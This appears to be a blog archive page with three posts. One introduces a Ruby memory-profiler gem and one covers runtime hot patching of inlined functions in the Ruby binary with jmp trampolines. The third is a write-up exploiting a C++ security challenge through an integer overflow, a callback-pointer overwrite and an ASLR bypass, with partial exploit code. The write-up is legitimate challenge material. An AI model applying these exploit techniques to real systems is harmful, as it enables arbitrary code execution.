Archive for the ‘x86’ tag
memprof: A Ruby level memory profiler

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.
What is memprof and why do I care?
memprof is a Ruby gem which supplies memory profiler functionality similar to bleak_house without patching the Ruby VM. You just install the gem, call a function or two, and off you go.
Where do I get it?
memprof is available on gemcutter, so you can just:
gem install memprof
Feel free to browse the source code at: http://github.com/ice799/memprof.
How do I use it?
Using memprof is simple. Before we look at some examples, let me explain more precisely what memprof is measuring.
memprof is measuring the number of objects created and not destroyed during a segment of Ruby code. The ideal use case for memprof is to show you where objects that do not get destroyed are being created:
- Objects are created and not destroyed when you create new classes. This is a good thing.
- Sometimes garbage objects sit around until garbage_collect has had a chance to run. These objects will go away.
- Yet in other cases you might be holding a reference to a large chain of objects without knowing it. Until you remove this reference, the entire chain of objects will remain in memory taking up space.
memprof will show objects created in all cases listed above.
OK, now let’s take a look at two examples and their output.
A simple program with an obvious memory “leak”:
require 'memprof'
@blah = Hash.new([])
Memprof.start
100.times {
@blah[1] << "aaaaa"
}
1000.times {
@blah[2] << "bbbbb"
}
Memprof.stats
Memprof.stop
This program creates 1100 objects which are not destroyed between the calls to Memprof.start and Memprof.stop because a reference is held for each object created.
Let's look at the output from memprof:
1000 test.rb:11:String
100 test.rb:7:String
In this example memprof shows the 1100 objects created, broken up by file, line number, and type.
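To see why all 1100 strings stay alive, it helps to look at where the references actually live. The following is a small sketch in plain Ruby (it does not use memprof, and the method name build_leak is made up for illustration). Because Hash.new([]) hands back the same default array for every missing key, each << appends to that one shared array, and the hash's reference to it keeps every string reachable:

```ruby
# Illustrative only: rebuilds the hash from the example above so it can be
# inspected. `build_leak` is a hypothetical name, not part of memprof.
def build_leak
  blah = Hash.new([])                # one shared default array for all keys
  100.times  { blah[1] << "aaaaa" }  # blah[1] returns the default array; << mutates it
  1000.times { blah[2] << "bbbbb" }  # same array again
  blah
end

blah = build_leak
puts blah.size                  # 0: no key was ever assigned
puts blah.default.size          # 1100: every string is held by the default array
puts blah[1].equal?(blah[2])    # true: both lookups return the same object
```

Dropping the reference to the hash (or replacing its default) is what would make those strings collectable.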
Let's take a look at another example:
require 'memprof'
Memprof.start
require "stringio"
StringIO.new
Memprof.stats
This simple program is measuring the number of objects created when requiring stringio.
Let's take a look at the output:
108 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:__node__
14 test2.rb:3:String
2 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Class
1 test2.rb:4:StringIO
1 test2.rb:4:String
1 test2.rb:3:Array
1 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Enumerable
This output shows an internal Ruby interpreter type __node__ was created (these represent code), as well as a few Strings and other objects. Some of these objects are just garbage objects which haven't had a chance to be recycled yet.
What if we nudge the garbage collector along a little bit just for our example? Let's add the following two lines of code to our previous example:
GC.start
Memprof.stats
We're now nudging the garbage collector and outputting memprof stats information again. This should show fewer objects, as the garbage collector will recycle some of the garbage objects:
108 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:__node__
2 test2.rb:3:String
2 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Class
1 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Enumerable
As you can see above, a few Strings and other objects went away after the garbage collector ran.
Which Rubies and systems are supported?
- Only unstripped binaries are supported. To determine if your Ruby binary is stripped, simply run: file `which ruby`. If it is, consult your package manager's documentation. Most Linux distributions offer a package with an unstripped Ruby binary.
- Only x86_64 is supported at this time. Hopefully, I'll have time to add support for i386/i686 in the immediate future.
- Linux Ruby Enterprise Edition (1.8.6 and 1.8.7) is supported.
- Linux MRI Ruby 1.8.6 and 1.8.7 built with --disable-shared are supported. Support for --enable-shared binaries is coming soon.
- Snow Leopard support is experimental at this time.
- Ruby 1.9 support coming soon.
How does it work?
If you've been reading my blog over the last week or so, you'd have noticed two previous blog posts (here and here) that describe some tricks I came up with for modifying a running binary image in memory.
memprof is a combination of all those tricks and other hacks to allow memory profiling in Ruby without the need for custom patches to the Ruby VM. You simply require the gem and off you go.
memprof works by inserting trampolines on object allocation and deallocation routines. It gathers metadata about the objects and outputs this information when the stats method is called.
What else is planned?
Jake Douglas, Aman Gupta, and I have lots of interesting ideas for new features. We don't want to ruin the surprise, but stay tuned. More cool stuff coming really soon :)
Thanks for reading and don't forget to subscribe (via RSS or e-mail) and follow me on twitter.
Hot patching inlined functions with x86_64 asm metaprogramming

Disclaimer
The tricks, techniques, and ugly hacks in this article are PLATFORM SPECIFIC, DANGEROUS, and NOT PORTABLE.
This article will make reference to information in my previous article Rewrite your Ruby VM at runtime to hot patch useful features so be sure to check it out if you find yourself lost during this article.
Also, this might not qualify as metaprogramming in the traditional definition [1], but this article will show how to generate assembly at runtime that works well with the particular instructions generated for a binary. In other words, the assembly is constructed based on data collected from the binary at runtime. When I explained this to Aman, he called it assembly metaprogramming.
TLDR
This article expands on a previous article by showing how to hook functions which are inlined by the compiler. This technique can be applied to other binaries, but the binary in question is Ruby Enterprise Edition 1.8.7. The use case is to build a memory profiler that requires no patches to the VM, just a Ruby gem.
It’s on GitHub
The memory profiler is NOT DONE, yet. It will be soon. Stay tuned.
The code described here is incorporated into a Ruby Gem which can be found on github: http://github.com/ice799/memprof specifically at: http://github.com/ice799/memprof/blob/master/ext/memprof.c#L202-318
Overview of the plan of attack
The plan of attack is relatively straightforward:
- Find the inlined code.
- Overwrite part of it to redirect to a stub.
- Call out to a handler from the stub.
- Make sure the return path is sane.
As simple as this seems, implementing these steps is actually a bit tricky.
Finding pieces of inlined code
Before finding pieces of inlined code, let’s first examine the C code we want to hook. I’m going to be showing how to hook the inline function add_freelist.
The code for add_freelist is short:
static inline void
add_freelist(p)
    RVALUE *p;
{
    if (p->as.free.flags != 0)
        p->as.free.flags = 0;
    if (p->as.free.next != freelist)
        p->as.free.next = freelist;
    freelist = p;
}
There is one really important feature of this code which stands out almost immediately. freelist has (at least) compilation unit scope. This is awesome because freelist serves as a marker when searching for assembly instructions to overwrite. Since the freelist has compilation unit scope, it’ll live at some static memory location.
If we find writes to this static memory location, we find our inline function code.
Let’s take a look at the instructions generated from this C code (unrelated instructions snipped out):
437f21: 48 c7 00 00 00 00 00    movq $0x0,(%rax)
. . . . .
437f2c: 48 8b 05 65 de 2d 00    mov 0x2dde65(%rip),%rax    # 715d98 [freelist]
. . . . .
437f48: 48 89 05 49 de 2d 00    mov %rax,0x2dde49(%rip)    # 715d98 [freelist]
The last instruction above updates freelist; it is the instruction generated for the C statement freelist = p;.
As you can see from the instruction, the destination is freelist. This makes it insanely easy to locate instances of this inline function. I just need to write a piece of C code which scans the binary image in memory, searching for mov instructions where the destination is freelist, and I’ve found the inlined instances of add_freelist.
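The scan described above boils down to a little address arithmetic: a RIP-relative store targets (address of the next instruction) + disp32. Here is a rough sketch of that check in Ruby, run over a byte string rather than a live process image. The method name and parameters are hypothetical, and the ModRM test is an extra sanity check added for this sketch, not something taken from memprof:

```ruby
# Sketch: find 7-byte "mov %reg, disp32(%rip)" stores that target a given address.
# code      - binary String holding machine code
# base_addr - address the first byte of `code` would have in memory
# target    - address of the variable being written (freelist in the article)
def find_rip_relative_stores(code, base_addr, target)
  bytes = code.bytes
  hits = []
  (0..bytes.length - 7).each do |i|
    rex, opcode, modrm = bytes[i], bytes[i + 1], bytes[i + 2]
    next unless rex == 0x48 || rex == 0x4c     # REX.W, with or without REX.R
    next unless opcode == 0x89                 # mov r64 -> r/m64
    next unless (modrm & 0xc7) == 0x05         # mod=00, r/m=101: RIP-relative (added check)
    disp = code.byteslice(i + 3, 4).unpack1("l<")  # signed little-endian disp32
    next_insn = base_addr + i + 7              # RIP points past the 7-byte mov
    hits << base_addr + i if next_insn + disp == target
  end
  hits
end

# The store from the listing above, preceded by two NOPs as filler.
code = [0x90, 0x90, 0x48, 0x89, 0x05, 0x49, 0xde, 0x2d, 0x00].pack("C*")
hits = find_rip_relative_stores(code, 0x437f46, 0x715d98)
puts hits.map { |a| a.to_s(16) }.inspect   # ["437f48"]
```

A byte-by-byte scan like this can in principle match in the middle of some other instruction, which is why comparing the computed target against the known address of freelist matters.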
Why not insert a trampoline by overwriting that last mov instruction?
Overwriting with a jmp
The mov instruction above is 7 bytes wide. As long as the instruction we’re going to implant is 7 bytes or thinner, everything is good to go. Using a callq is out of the question because we can’t ensure the stack is 16-byte aligned as per the x86_64 ABI [2]. As it turns out, a jmp instruction that uses a 32-bit displacement from the instruction pointer only requires 5 bytes. We’ll be able to implant the instruction that’s needed, and even have room to spare.
I created a struct to encapsulate this short 7 byte trampoline. 5 bytes for the jmp, 2 bytes for NOPs. Let’s take a look:
struct tramp_inline tramp = {
  .jmp = {'\xe9'},
  .displacement = 0,
  .pad = {'\x90', '\x90'},
};
Let’s fill in the displacement later, after actually finding the instruction that’s going to get overwritten.
So, to find the instruction that’ll be overwritten, just look for a mov opcode and check that the destination is freelist:
/* make sure it is a mov instruction */
if (byte[1] == '\x89') {
  /* Read the REX byte to make sure it is a mov that we care about */
  if ( (byte[0] == '\x48') ||
       (byte[0] == '\x4c') ) {
    /* Grab the target of the mov. REMEMBER: in this case the target is
     * a 32bit displacement that gets added to RIP (where RIP is the address of
     * the next instruction).
     */
    mov_target = *(uint32_t *)(byte + 3);
    /* Sanity check. Ensure that the displacement from freelist to the next
     * instruction matches the mov_target. If so, we know this mov is
     * updating freelist.
     */
    if ( (freelist - (void *)(byte+7) ) == mov_target) {
At this point we’ve definitely found a mov instruction with freelist as the destination. Let’s calculate the displacement to the stage 2 trampoline for our jmp instruction and write the instruction into memory.
/* Setup the stage 1 trampoline. Calculate the displacement to
* the stage 2 trampoline from the next instruction.
*
* REMEMBER!!!! The next instruction will be NOP after our stage 1
* trampoline is written. This is 5 bytes into the structure, even
* though the original instruction we overwrote was 7 bytes.
*/
tramp.displacement = (uint32_t)(destination - (void *)(byte+5));
/* Figure out what page the stage 1 tramp is gonna be written to, mark
* it WRITE, write the trampoline in, and then remove WRITE permission.
*/
aligned_addr = page_align(byte);
mprotect(aligned_addr, (void *)byte - aligned_addr + 10,
PROT_READ|PROT_WRITE|PROT_EXEC);
memcpy(byte, &tramp, sizeof(struct tramp_inline));
mprotect(aligned_addr, (void *)byte - aligned_addr + 10,
PROT_READ|PROT_EXEC);
Cool, all that’s left is to build the stage 2 trampoline which will set everything up for the C level handler.
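The displacement arithmetic for the stage 1 trampoline is easy to get wrong by two bytes, so here is a minimal sketch of it in Ruby. It only builds the 7 bytes; it does not patch anything. The method name and the addresses in the usage lines are made up for illustration:

```ruby
# Sketch: build the 7-byte stage 1 trampoline (jmp rel32 plus two NOPs).
# patch_addr - address of the mov being overwritten
# stub_addr  - address of the stage 2 trampoline
def stage1_trampoline(patch_addr, stub_addr)
  disp = stub_addr - (patch_addr + 5)   # relative to the byte after the 5-byte jmp
  unless (-2**31...2**31).cover?(disp)
    raise RangeError, "stage 2 trampoline is out of rel32 range"
  end
  [0xe9, disp].pack("Cl<") + [0x90, 0x90].pack("C*")
end

tramp = stage1_trampoline(0x437f48, 0x438f48)
puts tramp.bytes.map { |b| format("%02x", b) }.join(" ")  # e9 fb 0f 00 00 90 90
```

The range check is an addition in this sketch: a rel32 jmp can only reach targets within about 2GB of the patched instruction, so the stage 2 trampoline has to live close enough to the code being patched.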
An assembly stub to set the stage for our C handler
So, what does the assembly need to do to call the C handler? Quite a bit actually so let’s map it out, step by step:
- Replicate the instruction which was overwritten so that the object is actually added to the freelist.
- Save the value of the rdi register. This register is where the first argument to a function lives and will store the obj that was added to the freelist for the C handler to do analysis on.
- Load the object being added to the freelist into rdi.
- Save the value of rbx so that we can use the register as an operand for an absolute indirect callq instruction.
- Save rbp and rsp to allow a way to undo the stack alignment later.
- Align the stack to a 16-byte boundary to comply with the x86_64 ABI.
- Move the address of the handler into rbx.
- Call the handler through rbx.
- Restore rbp, rsp, rdi, rbx.
- Jump back to the instruction after the instruction which was overwritten.
To accomplish this let’s build out a structure with as much set up as possible and fill in the displacement fields later. This “base” struct looks like this:
struct inline_tramp_tbl_entry inline_ent = {
  .rex = {'\x48'},
  .mov = {'\x89'},
  .src_reg = {'\x05'},
  .mov_displacement = 0,
  .frame = {
    .push_rdi = {'\x57'},
    .mov_rdi = {'\x48', '\x8b', '\x3d'},
    .rdi_source_displacement = 0,
    .push_rbx = {'\x53'},
    .push_rbp = {'\x55'},
    .save_rsp = {'\x48', '\x89', '\xe5'},
    .align_rsp = {'\x48', '\x83', '\xe4', '\xf0'},
    .mov = {'\x48', '\xbb'},
    .addr = error_tramp,
    .callq = {'\xff', '\xd3'},
    .leave = {'\xc9'},
    .rbx_restore = {'\x5b'},
    .rdi_restore = {'\x5f'},
  },
  .jmp = {'\xe9'},
  .jmp_displacement = 0,
};
So, what’s left to do:
- Copy the REX and source register bytes of the instruction which was overwritten to replicate it.
- Calculate the displacement to freelist to fully generate the overwritten mov.
- Calculate the displacement to freelist so that it can be stored in rdi as an argument to the C handler.
- Fill in the absolute address for the handler.
- Calculate the displacement to the instruction after the stage 1 trampoline in order to jmp back to resume execution as normal.
Doing that is relatively straightforward. Let’s take a look at the C snippets that make this happen:
/* Before the stage 1 trampoline gets written, we need to generate
* the code for the stage 2 trampoline. Let's copy over the REX byte
* and the byte which mentions the source register into the stage 2
* trampoline.
*/
inl_tramp_st2 = inline_tramp_table + entry;
inl_tramp_st2->rex[0] = byte[0];
inl_tramp_st2->src_reg[0] = byte[2];
. . . . .
/* Finish setting up the stage 2 trampoline. */
/* calculate the displacement to freelist from the next instruction.
*
* This is used to replicate the original instruction we overwrote.
*/
inl_tramp_st2->mov_displacement = freelist - (void *)&(inl_tramp_st2->frame);
/* fill in the displacement to freelist from the next instruction.
*
* This is to arrange for the new value in freelist to be in %rdi, and as such
* be the first argument to the C handler. As per the amd64 ABI.
*/
inl_tramp_st2->frame.rdi_source_displacement = freelist -
(void *)&(inl_tramp_st2->frame.push_rbx);
/* jmp back to the instruction after stage 1 trampoline was inserted
*
* This can be 5 or 7, it doesn't matter. If it's 5, we'll hit our 2
* NOPs. If it's 7, we'll land directly on the next instruction.
*/
inl_tramp_st2->jmp_displacement = (uint32_t)((void *)(byte + 7) -
(void *)(inline_tramp_table + entry + 1));
/* write the address of our C level trampoline in to the structure */
inl_tramp_st2->frame.addr = freelist_tramp;
Awesome.
We’ve successfully patched the binary in memory, inserted an assembly stub which was generated at runtime, called a hook function, and ensured that execution can resume normally.
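To double check how the pieces of the stage 2 trampoline fit together, the same byte layout can be sketched in Ruby. This is only an illustration of the encoding and the three displacement calculations; memprof itself fills in a C struct as shown above. The method name, keyword arguments, and the addresses in the usage lines are all invented for the example:

```ruby
# Sketch: assemble the stage 2 stub as a binary String.
def stage2_stub(stub_addr:, freelist_addr:, handler_addr:, return_addr:,
                rex: 0x48, modrm: 0x05)
  code = String.new(encoding: Encoding::BINARY)
  # disp32 measured from the end of an instruction of `len` bytes that
  # starts at the current end of `code`
  rel = ->(target, len) { target - (stub_addr + code.bytesize + len) }

  code << [rex, 0x89, modrm, rel.(freelist_addr, 7)].pack("C3l<") # replay: mov %reg, freelist(%rip)
  code << [0x57].pack("C")                                         # push %rdi
  code << [0x48, 0x8b, 0x3d, rel.(freelist_addr, 7)].pack("C3l<") # mov freelist(%rip), %rdi
  code << [0x53, 0x55].pack("C*")                                  # push %rbx; push %rbp
  code << [0x48, 0x89, 0xe5].pack("C*")                            # mov %rsp, %rbp
  code << [0x48, 0x83, 0xe4, 0xf0].pack("C*")                      # and $-16, %rsp
  code << [0x48, 0xbb, handler_addr].pack("C2Q<")                  # movabs $handler, %rbx
  code << [0xff, 0xd3].pack("C*")                                  # call *%rbx
  code << [0xc9, 0x5b, 0x5f].pack("C*")                            # leave; pop %rbx; pop %rdi
  code << [0xe9, rel.(return_addr, 5)].pack("Cl<")                 # jmp back to the patched site
  code
end

stub = stage2_stub(stub_addr: 0x10000000, freelist_addr: 0x715d98,
                   handler_addr: 0x7f0011223344, return_addr: 0x437f4f)
puts stub.bytesize   # 44
```

Each displacement is measured from the end of the instruction that uses it, which is why the two freelist displacements differ even though they point at the same address.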
So, what’s the status on that memory profiler?
Almost done, stay tuned for more updates coming SOON.
Conclusion
- Hackery like this is unmaintainable, unstable, stupid, but also fun to work on and think about.
- Being able to hook add_freelist like this provides the last tool needed to implement a version of bleak_house (a Ruby memory profiler) without patching the Ruby VM.
- The x86_64 instruction set is a painful instruction set.
- Use the GNU assembler (gas) instead of trying to generate opcodes by reading the Intel instruction set PDFs if you value your sanity.
References
Debugging Ruby: Understanding and Troubleshooting the VM and your Application
Download the PDF here.
Defeating the Matasano C++ Challenge with ASLR enabled

Important note
I am NOT a security researcher (I kinda want to be though). As such, there are probably way better ways to do everything in this article. This article is just illustrating my thought process when cracking this challenge.
The Challenge
The Matasano Security blog recently posted an article titled A C++ Challenge [1] which included a particularly ugly piece of C++ code that has a security vulnerability. The challenge is for the reader to find the vulnerability, use it to execute arbitrary code, and submit the data to Matasano.
Sounds easy enough, let’s do this! cue hacking music
Making it harder
Recent Linux kernels have a feature called Address Space Layout Randomization (ASLR) which can be set in /proc/sys/kernel/randomize_va_space. ASLR is a security feature which randomizes the start address of various parts of a process image. Doing this makes exploiting a security bug more difficult because the exploit cannot use any hard-coded addresses.
The options you can set are:
- 0 – ASLR off
- 1 – Randomize the addresses of the stack, mmap area, and VDSO page. This is the default.
- 2 – Everything in option 1, but also randomize the brk area so the heap is randomized.
Just for fun I decided to set it to 2 to make exploiting the challenge more difficult.
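If you want to check which mode a machine is in, a small sketch like the following reads the setting and maps it to the options listed above. The constant and method names are made up, and the script simply reports when the /proc file is not available (for example on a non-Linux system):

```ruby
# Descriptions follow the list above; names here are illustrative only.
ASLR_MODES = {
  0 => "ASLR off",
  1 => "randomize stack, mmap area, and VDSO page",
  2 => "everything in 1, plus the brk area (heap)"
}.freeze

# Returns the description for a raw setting such as "2\n".
def describe_aslr(raw)
  ASLR_MODES.fetch(Integer(raw.strip), "unknown setting")
end

path = "/proc/sys/kernel/randomize_va_space"
if File.readable?(path)
  puts describe_aslr(File.read(path))
else
  puts "#{path} not available on this system"
end
```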
Got the code, but now what?
I decided to start attacking this problem by looking for a few common errors, in this order:
- strcpy()/strncpy() bugs: no calls
- memcpy() bugs: a few calls
- Off by one bugs: none obvious
It turned out from a quick look that all calls to memcpy() included sane, hard-coded values. So, it had to be something more complex.
Digging deeper – finding input streams the user can control
Next, I decided to actually read the code and see what it was doing at a high level and what inputs could be controlled. Turns out that the program reads data from a file and uses the data from the file to determine how many objects to allocate.
Obviously, this portion of the code caught my interest so let’s take a quick look:
/* ... */
fd.read(file_in_mem, MAX_FILE_SIZE-1);
/* ... */
struct _stream_hdr *s = (struct _stream_hdr *) file_in_mem;
if(s->num_of_streams >= INT_MAX / (int)sizeof(int)) {
safe_count = MAX_STREAMS;
} else {
safe_count = s->num_of_streams;
}
Obj *o = new Obj[safe_count];
OK, so clearly that if statement is suspect. At the very least it doesn’t check for negative values, so you could end up with safe_count = -1 which might do something interesting when passed to the new operator. Moreover, it appears this if statement will allow values as large as 536870910 ([INT_MAX / sizeof(int)] – 1).
Maybe the exploit has something to do with values this if statement is allowing through?
A closer look at the integer overflow in new
Let’s use GDB to take a closer look at what the compiler does before calling new. I’ve added a few comments in line to explain the assembly code:
mov %edx,%eax               ; %edx and %eax store s->num_of_streams
add %eax,%eax               ; add %eax to itself (s->num_of_streams * 2)
add %edx,%eax               ; add s->num_of_streams + %eax (s->num_of_streams * 3)
shl $0x2,%eax               ; multiply (s->num_of_streams * 3) by 4 (s->num_of_streams * 12)
mov %eax,(%esp)             ; move it into position to pass to new
call 0x8048a7c <_Znaj@plt>  ; call new
The compiler has generated code to calculate s->num_of_streams * sizeof(Obj), where sizeof(Obj) is 12 bytes. For large values of s->num_of_streams, multiplying by 12 causes an integer overflow and the value passed to new will actually be less than what was intended.
For my exploit, I ended up using the value 357913943. This value causes an overflow because 357913943 * 12 = 4294967316, which exceeds 2^32 (4294967296) by 20, so the 32-bit value passed to new wraps around to 20. That is, of course, significantly less than what we actually wanted to allocate. Other people have written about integer overflow in new in other compilers [2] before.
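The arithmetic is easy to verify outside of GDB. Here is a quick sketch in Ruby, whose integers do not overflow, so the 32-bit wraparound is applied by hand with a mask. The constant and method names are invented for this example:

```ruby
OBJ_SIZE   = 12          # sizeof(Obj), per the disassembly above
INT_MAX    = 2**31 - 1
SIZEOF_INT = 4

# Mirrors the challenge's if statement: counts at or above
# INT_MAX / sizeof(int) get clamped, everything else passes through.
def passes_check?(count)
  count < INT_MAX / SIZEOF_INT
end

# Size actually handed to new after 32-bit wraparound.
def alloc_bytes(count)
  (count * OBJ_SIZE) & 0xffff_ffff
end

count = 357_913_943
puts passes_check?(count)   # true
puts count * OBJ_SIZE       # 4294967316
puts alloc_bytes(count)     # 20
```

So the count sails through the check, the program believes it has 357913943 objects, and the allocation behind them is only 20 bytes.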
Let’s see how this can be used to cause arbitrary code to execute. Remember, for arbitrary code execution to occur there must be a way to cause the target program to write some data to a memory address that can be controlled.
Find the (possible) hand-off(s) to arbitrary code
To find any hand-off locations, I looked for places where memory writes were occurring in the program. I found a few memory writes:
- 2 calls to memset()
- 2 calls to memcpy()
- parse_stream() of class Obj
Unfortunately (from the attacker’s perspective) the calls to memcpy() and memset() looked pretty sane. The parse_stream() function caught my interest, though.
Take a look:
class Obj {
public:
    int parse_stream(int t, char *stream)
    {
        type = t;
        // ... do something with stream here ...
        return 0;
    }
    int length;
    int type;
    /* ... */
REMEMBER: In C++, member functions of classes have a sekrit parameter which is a pointer to the object the function is being called on. In the function itself, this parameter is accessed using this. So the line writing to the type variable is actually doing this->type = t; where this is supplied to the function sekritly by the compiler.
This is important because this piece of code could be our hand-off! We need to find a way to control the value of this so we can cause a memory write to a location of our choice.
Controlling this to cause arbitrary code to execute
Take a look at an important piece of code in the challenge:
struct imetad {
    int msg_length;
    int (*callback)(int, struct imetad *);
    /* ... */
Nice! The callback field of struct imetad is offset by 4 bytes into the structure. The type field of class Obj is also offset by 4 bytes. See where I’m going?
If we can control the this pointer to point at the struct imetad on the heap when parse_stream is called, it will overwrite the callback pointer. We’ll then be able to set the pointer to any address we want and hand-off execution to arbitrary code!
But how can we manipulate this?
Take a look at this piece of code that calls callback:
o[i].parse_stream(dword, stream_temp);
imd->callback(o[i].type, imd);
Since it is possible to overflow new and allocate fewer objects than safe_count is counting, that means that for some values of i, o[i] will be pointing at data that isn’t actually an Obj object, but just other data on the heap. In fact, when i = 2, o[i] will be pointing at the struct imetad object on the heap. The call to parse_stream will pass in a corrupted this pointer that points at struct imetad. The write to type will actually overwrite callback since they are both offset equal amounts into their respective structures.
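The overlap is just pointer arithmetic, which can be sketched in a few lines of Ruby. The heap address below is made up, and the position of struct imetad (24 bytes past the start of the array) is an assumption taken from the i = 2 observation above, not something measured here:

```ruby
OBJ_SIZE        = 12  # sizeof(Obj), per the disassembly earlier
TYPE_OFFSET     = 4   # offset of type inside Obj
CALLBACK_OFFSET = 4   # offset of callback inside struct imetad

# Address written by `this->type = t` when parse_stream is called on o[i].
def type_write_addr(array_base, i)
  array_base + i * OBJ_SIZE + TYPE_OFFSET
end

array_base    = 0x0804c008                 # hypothetical heap address of o
imetad_addr   = array_base + 2 * OBJ_SIZE  # assumption: imetad sits where o[2] would be
callback_addr = imetad_addr + CALLBACK_OFFSET

puts type_write_addr(array_base, 2) == callback_addr   # true
puts type_write_addr(array_base, 1) == callback_addr   # false
```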
And with that, we’ve successfully exploited the challenge causing arbitrary code to execute.
Let’s now figure out how to beat ASLR!
How to defeat address space layout randomization
I did NOT invent this technique, but I read about it and thought it was cool. You can read a more verbose explanation of this technique here. The idea behind the technique is pretty simple:
- When you call exec, the PID remains the same, but the image of the process in memory is changed.
- The kernel uses the PID and the number of jiffies (jiffies is a fine-grained time measurement in the kernel) to pull data from the entropy pool.
- If you can run a program which records stack, heap, and other addresses and then quickly call exec to start the vulnerable program, you can end up with the same memory layout.
My exploit program is actually a wrapper which records an approximate location of the heap (by just calling malloc()), generates the exploit file, and then executes the challenge binary.
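The first point in the list, that exec keeps the PID, is easy to confirm for yourself. Below is a minimal sketch in Ruby for a Unix-like system with fork available; the method name is invented for this example. It says nothing about the kernel's entropy handling and only shows that the process image changes while the PID does not:

```ruby
require "rbconfig"

# Forks a child, has it exec a fresh Ruby that prints its own PID, and
# returns [pid_seen_by_parent, pid_reported_after_exec].
def pid_across_exec
  reader, writer = IO.pipe
  child = fork do
    reader.close
    # exec replaces the process image; the PID stays the same
    exec(RbConfig.ruby, "-e", "puts Process.pid", out: writer)
  end
  writer.close
  reported = reader.read.to_i
  Process.wait(child)
  [child, reported]
end

before, after = pid_across_exec
puts before == after   # true
```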
Take a look at the relevant pieces of my exploit to get an idea of how it works:
/* ... */
/* do a malloc to get an idea of where the heap lives */
void *dummy = malloc(10);
/* ... */
unsigned int shell_addr = reinterpret_void_ptr_as_uint(dummy);
/*
* XXX TODO FIXME - on my platform, execl'ing from here to the challenge binary
* incurs a constant offset of 0x3160, probably for changes in the environment
* (libs linked for c++ and whatnot).
*/
shell_addr += 0x3160;
/*
* a guess as to how far off the heap the shellcode lives.
*
* luckily we have a large NOP sled, so we should only fail when we miss
* the current entropy cycle (see below).
*/
shell_addr += 700;
/* ... build exploit file in memory ... */
/* copy in our best guess as to the address of the shellcode, pray NOPs
* take care of the rest! */
memcpy(entire_file+88, &shell_addr, sizeof(shell_addr));
/* ... write exploit out to disk ... */
/* launch program with the generated exploit file!
*
* calling execl here inherits the PID of this process, and IF we get lucky
* ~85%+ of the time, we'll execute before the next entropy cycle and hit
* the shellcode, even with ASLR=2.
*/
execl("./cpp_challenge", "cpp_challenge", "exploit", (char *)0);
My exploit for the C++ challenge
My exploit comes with the following caveats:
- i386 system
- The challenge binary is called “cpp_challenge” and lives in the same directory as the exploit binary.
- The exploit binary can write to the directory and create a file called “exploit” which will be handed off to “cpp_challenge”
Get the full code of my exploit here.
Results
Results on my i386 Ubuntu 8.04 VM running in VMWare fusion, for each level of randomize_va_space:
- 0 – 100% exploit hit rate
- 1 – 100% exploit hit rate
- 2 – ~85% exploit hit rate. Sometimes, my exploit code falls out of the time window and the address map changes before the challenge binary is run
I could probably boost the hit rate for 2 a bit, but then I’d probably re-write the entire exploit in assembly to make it run as fast as possible. I didn’t think there was really a point to going to such an extreme, though. So, an 85% hit rate is good enough.
Conclusion
- Security challenges are fun.
- More emphasis and more freely available information on secure coding would be very useful.
- Like it or not developers need to be security conscious when writing code in C and C++.
- As C and C++ change, developers need to carefully consider security implications of new features.
References
Ruby Hoedown Slides
Below are the slides for a talk that Aman Gupta and I gave at Ruby Hoedown
Download the PDF here

